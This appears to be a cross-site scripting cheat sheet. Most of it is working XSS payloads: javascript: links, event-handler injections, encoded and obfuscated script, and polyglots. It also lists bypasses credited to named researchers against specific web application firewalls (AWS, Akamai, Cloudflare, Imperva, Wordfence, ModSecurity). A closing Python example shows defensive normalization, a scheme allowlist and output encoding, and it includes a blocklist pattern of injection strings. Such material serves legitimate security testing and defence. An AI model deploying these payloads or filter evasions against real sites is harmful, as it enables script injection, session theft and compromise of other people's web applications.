Try to use these payloads:
1) <a href="javascript:alert(1)">Click</a>
2) <a href="javascript:alert(1)">Click</a>
3) <a href="javascript:{ alert`0` }">Click</a>
4) <a src="google.com" onclick="alert(1)">Click</a>
Or try to replace " with \u0022, > with \u003e and < with \u003c. So the payload will be:
5) \u0022\u003e\u003cimg src=x onerror=alert(1)\u003e\u003cx y=\u0022
Try event handlers:
1) <input value"XXXXXXX" onclick=alert(1) >Click</input>
2) <input type:"text" value="XSS" accesskey="x" onclick="alert(1)" >
3) <img src=x onerror="javascript:alert('XSS')">
4) </div><a src="google.com" href="javaSCRIPT:alert(/xss/)">XSS</a>
5) <a href=https://google.com onclick=alert(document.location.hash.substring(1))#{saasasasas}>Click</a>
or use encodings:
use Unicode encodings: UTF-8, UTF-16, UTF-32
%3cscript%3e
%253cscript%253e
<script>
%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)>
%uFF1Csvg onload=alert(3)>
Burp Suite > Convert Selection > HTML > HTML-encode all characters
<a href="javascript:alert(1)">Click</a> =
<a href="javascript:alert(1)">Click</a>
Try to use these payloads:
1) <script>$='',_=!$+$,$$=!_+$,$_=$+{},_$=_[$++],__=_[_$$=$],_$_=++_$$+$,$$$=$_[_$$+_$_],_[$$$+=$_[$]+(_.$$+$_)[$]+$$[_$_]+_$+__+_[_$$]+$$$+_$+$_[$]+__][$$$]($$[$]+$$[_$$]+_[_$_]+__+_$+"($)")()</script>
2) <script>[[,$,_,$$,__,$_,_$,$$$,$__,,___]=[![]+[]+!![]][+[]]+[][[]]],$$_=[][$+$_],[,,,$_$,,,_$$,,,,,__$,_$_]=[...$$_+[]],$_$+_$$+___+$$+$_+_$+$$$+$_$+$_+_$$+_$$$_[$_$+_$$+___+$$+$_+_$+$$$+$_$+$_+_$$+_$]($+_+__+_$+$_+__$+[+!!$]+_$_)()</script>
3) <script>([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+`(1)`)()</script>
4) <html>
<head>
<meta charset="utf-8">
</head>
<body>
<script>
ᐁ='',ᐃ=!ᐁ+ᐁ,ᐅ=!ᐃ+ᐁ
ᐊ=ᐁ+{},ᐄ=ᐃ[ᐁ++],ᐆ=
ᐃ[ᐋ=ᐁ],ᐒ=++ᐋ+ᐁ,ᐗ
=ᐊ[ᐋ+ᐒ],ᐃ[ᐗ+=ᐊ[ᐁ]
+(ᐃ.ᐅ+ᐊ)[ᐁ]+ᐅ[ᐒ]+ᐄ
+ᐆ+ᐃ[ᐋ]+ᐗ+ᐄ+ᐊ[ᐁ]
+ᐆ][ᐗ](ᐅ[ᐁ]+ᐅ[ᐋ]+ᐃ
[ᐒ]+ᐆ+ᐄ+"`ᐁᐃ`")()
</script>
</body>
</html>
5) <script>prompt(1)</script>
6) <a"/onclick=(confirm)()>Click Here!
7) <script>/&/-alert(1)</script>
<script>/&/-alert(1)</script>
8) %00%00%00%00%00%00%00<script>alert(1)</script> (works when: 1. the null bytes are reflected in the output, and 2. there is no space character immediately before the payload)
9) <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`">
10) <bleh/onclick=top[/al/.source+/ert/.source]	``>click
11) <script>alert.call(null,1)</script> (alert.call(%20, "XSS");)
12) <script>confirm.call(null,1)</script>
13) <script>prompt.call(null,1)</script>
14) <script>alert.apply(null, [1])</script>
15) <iframe src=//14.rs>
16) <form><button formaction=http://14.rs>Hacked</form>
use a URL-encoded tab (%09) as the separator:
<input%09value"XXXXXXX"%09onclick=alert(1)>Click</input>
<script>alert`1`</script>
SVG, img, iframe
@vanshitmalhotra | Bypass AWS WAF -//
Add "<!" (without quotes) before your payload and bypass that WAF. :)
eg: <!<script>confirm(1)</script>
@black0x00mamba | Bypass AkamaiGhost WAF & filtered onload, onclick, href, src, onerror, script, etc.
<img sr%00c=x o%00nerror=((pro%00mpt(1)))>
DotDefender WAF bypass by @0xInfection
<bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme
@LooseSecurity | Updated CloudFlare bypass (bypasses virtually all WAF you'll encounter in the wild):
<iframe/src='%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A:prompt`1`'>
Javascript URI cushioned between carriage returns with a non-bracketed prompt.
@daveysec | Was able to bypass Imperva Incapsula WAF with:
<svg onload\r\n=$.globalEval("al"+"ert()");>
@rodolfoassis | Wordfence 7.4.2
<a href=javascript:alert(1)>
@rodolfoassis | Sucuri CloudProxy (POST only)
<a href=javascript:confirm(1)>
@rodolfoassis | ModSecurity CRS 3.2.0 PL1
<a href="jav%0Dascript:alert(1)">
@brutelogic | Cloudflare
<Svg Only=1 OnLoad=alert(1)>
<script>{onerror=alert}throw 1</script> -->
<script>eval.call`${'alert\x2823\x29'}`</script>
<img src=x onerror=this.innerHTML=String.fromCharCode(60,105,109,103,32,115,114,99,61,39,120,39,32,111,110,101,114,114,111,114,61,39,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59,39,62)
### 7. Some good stuff:
https://github.com/Walidhossain010/WAF-bypass-xss-payloads
https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057
### 7. XSS Polyglots
Polyglots allow you to test multiple XSS scenarios with ONE payload. Work smarter, not harder:
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
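Most of the bypasses on this page share one mechanism: the browser decodes and normalizes the value (percent and %u/\u escapes, HTML entities, full-width characters, CR/LF/NUL characters inside a URL scheme) after a pattern-matching filter has already inspected the raw bytes. The Python example below is added for this page and is not code from any of the credited authors; it shows the defender's side of that gap. It contains a normalize-then-match check for detection, and, for the application itself, a scheme allowlist for href/src sinks plus attribute output encoding, which neutralize these payload shapes whatever encoding they arrive in. The sample strings are constructed from the shapes listed above, and the function names, the naive blocklist pattern and the three-scheme allowlist are assumptions of this example, not part of any product.

```python
import html
import re
import unicodedata
from typing import Optional, Tuple
from urllib.parse import unquote, urlsplit

# Constructed samples modelled on the payload shapes listed on this page.
SAMPLE_HREFS = [
    "javascript:alert(1)",
    "javaSCRIPT:alert(/xss/)",                                  # case variation
    "jav%0Dascript:alert(1)",                                   # CR inside the scheme
    "%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A:prompt`1`",    # LF-cushioned scheme
    "//14.rs",                                                  # protocol-relative, off-site
    "https://example.com/page?x=1",                             # benign absolute URL
    "/relative/path",                                           # benign relative URL
]
SAMPLE_VALUES = [
    '"><img src=x onerror=alert(1)><x y="',
    "\\u0022\\u003e\\u003cimg src=x onerror=alert(1)\\u003e\\u003cx y=\\u0022",
    "%3cscript%3e",
    "%253cscript%253e",                                          # double percent-encoding
    "%u003Csvg onload=alert(1)>",
    "%uFF1Csvg onload=alert(3)>",                                # full-width '<' (U+FF1C)
    "plain text value",
]

_CONTROL = re.compile(r"[\x00-\x1f\x7f]")
_U_ESC = re.compile(r"(?:\\u|%u)([0-9a-fA-F]{4})")
ALLOWED_SCHEMES = {"http", "https", "mailto"}          # assumption: app policy
# A deliberately naive blocklist, standing in for a pattern-only WAF rule.
NAIVE_BLOCKLIST = re.compile(r"<\w+|javascript:", re.I)


def normalize(raw: str) -> str:
    """Apply the decodings a browser performs before it interprets the value.

    Percent-decoding runs twice to catch %25-style double encoding, %uXXXX and
    \\uXXXX escapes and HTML entities are expanded, NFKC folds full-width
    look-alikes (U+FF1C -> '<'), and ASCII control characters (NUL, TAB, CR, LF)
    are dropped because browsers ignore them inside a URL scheme.
    """
    s = unquote(unquote(raw))
    s = _U_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)
    s = html.unescape(s)
    s = unicodedata.normalize("NFKC", s)
    return _CONTROL.sub("", s).lower()


def blocklist_hits(raw: str) -> Tuple[bool, bool]:
    """Return (hit on raw input, hit on normalized input).

    The difference between the two is exactly the set of evasions a filter
    misses when it matches patterns before normalizing.
    """
    return bool(NAIVE_BLOCKLIST.search(raw)), bool(NAIVE_BLOCKLIST.search(normalize(raw)))


def safe_href(raw: str) -> Optional[str]:
    """Scheme allowlist for href/src sinks.

    Returns the value when it is a same-origin relative URL or uses an allowed
    scheme, otherwise None (the caller substitutes a harmless default).
    """
    parts = urlsplit(normalize(raw))
    if parts.scheme == "" and parts.netloc == "":
        return raw                                   # relative URL, same origin
    return raw if parts.scheme in ALLOWED_SCHEMES else None


def safe_attr(value: str) -> str:
    """Output-encode for a double-quoted HTML attribute: & < > " ' become entities,
    so the value can never close the attribute or open a tag."""
    return html.escape(value, quote=True)


def render_link(href: str, text: str) -> str:
    """Build an <a> element the safe way: allowlisted scheme plus output encoding."""
    url = safe_href(href)
    return f'<a href="{safe_attr(url if url is not None else "#")}">{html.escape(text)}</a>'


if __name__ == "__main__":
    for h in SAMPLE_HREFS:
        raw_hit, norm_hit = blocklist_hits(h)
        print(f"{h!r:62} blocklist raw={raw_hit!s:5} normalized={norm_hit!s:5} "
              f"safe_href={safe_href(h)!r}")
    for v in SAMPLE_VALUES:
        raw_hit, norm_hit = blocklist_hits(v)
        print(f"{v!r:62} blocklist raw={raw_hit!s:5} normalized={norm_hit!s:5} "
              f"encoded={safe_attr(v)!r}")
```

The detection lesson is in `blocklist_hits`: on the raw bytes the CR-split and %u/full-width samples never match, after `normalize` all of them do. The application-side lesson is that `safe_href` and `safe_attr` do not need to recognise any particular payload at all; they decide on the decoded scheme and encode everything else, which is why they hold up against the polyglots above as well.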